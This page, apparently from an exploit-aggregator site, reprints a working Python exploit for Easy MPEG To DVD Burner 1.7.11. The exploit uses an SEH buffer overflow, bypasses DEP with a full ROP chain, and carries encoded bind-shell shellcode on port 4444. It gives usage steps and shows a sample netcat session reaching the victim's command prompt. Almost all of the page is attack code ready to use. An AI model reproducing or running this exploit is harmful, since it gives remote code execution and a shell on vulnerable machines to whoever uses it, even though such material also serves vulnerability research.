Advertisement






Easy MPEG To DVD Burner 1.7.11 Buffer Overflow

CVE Category Price Severity
N/A CWE-119 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2018-05-21
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050145

Below is a copy:

Easy MPEG To DVD Burner 1.7.11 Buffer Overflow
#!/usr/bin/python
 
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow                                                     #
# Date: 2018-05-19                                                                                                                   #
# Author: Juan Prescotto                                                                                                             #
# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html                                             #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe                        #
# Version: 1.7.11                                                                                                                    #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit              #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00\x0a\x0d                                                                                                        #
# SEH Offset: 1012                                                                                                                   #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe                                                             #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444                                                                                         #
# (UNKNOWN) [10.0.1.14] 4444 (?) open                                                                                                #
# Microsoft Windows [Version 6.1.7601]                                                                                               #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.                                                                     #
#                                                                                                                                    #
# C:\Program Files (x86)\Easy MPEG to DVD Burner>                                                                                    #
#------------------------------------------------------------------------------------------------------------------------------------#
 
# My register setup when VirtualAlloc() is called (Defeat DEP) :
#--------------------------------------------
# EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x01)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)
 
import struct
 
def create_rop_chain():
 
    rop_gadgets = [
      #***START VirtualAlloc() to ESI***
      0x10027e6b,  # POP EAX # RETN [SkinMagic.dll] ** 
      0x1003b1d4,  # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
      0x100369a1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll] 
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xffffffff,  #  
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bc0,  # POP EDX # RETN [SkinMagic.dll]
      0xffffffff,  #
      0x10035a07,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa141dffb,  # 
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141,  # FILLER
      0x1003993e,  # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      #***END VirtualAlloc() to ESI***
 
      #***START 0x40 to ECX***
      0x100185fb,  # XOR EAX,EAX # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER  
      0x10037c5b,  # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x10032176,  # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
      #***END 0x40 to ECX***
 
      #***START 0x1000 to EDX***
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xaaaaaaaa,  #
      0x10037bc0,  # POP EDX # RETN [SkinMagic.dll]
      0x55556556,  #
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa141dffb,  # 
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141,  # FILLER
      #***END 0x1000 to EDX***
 
      #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
      0x1002829d,  # POP EBP # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x100284f8,  # {pivot 16 / 0x10} :  # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
      #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
 
      #***START 0x1 to EBX***
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xffffffff,  #  
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll] 
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      #***END 0x1 to EBX***
 
      #***START ROP NOP to EDI***
      0x100342f0,  # POP EDI # RETN [SkinMagic.dll] 
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      #***END ROP NOP to EDI***
 
      #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa140acd2,  # CONSTANT
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555",   # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555,   # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      #***END Gadgets to execute PUSHAD***
 
      #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x1001cc57,  # & push esp # ret  [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
rop_chain = create_rop_chain()
 
nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} :  # ADD ESP,0C # RETN [SkinMagic.dll]
nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) :  # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
nop = "\x90" * 20
 
#Max Space Avaliable for Shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)                           #
#------------------------------------------------------------------------------------#
shellcode =  ""
shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
 
exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh
 
f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum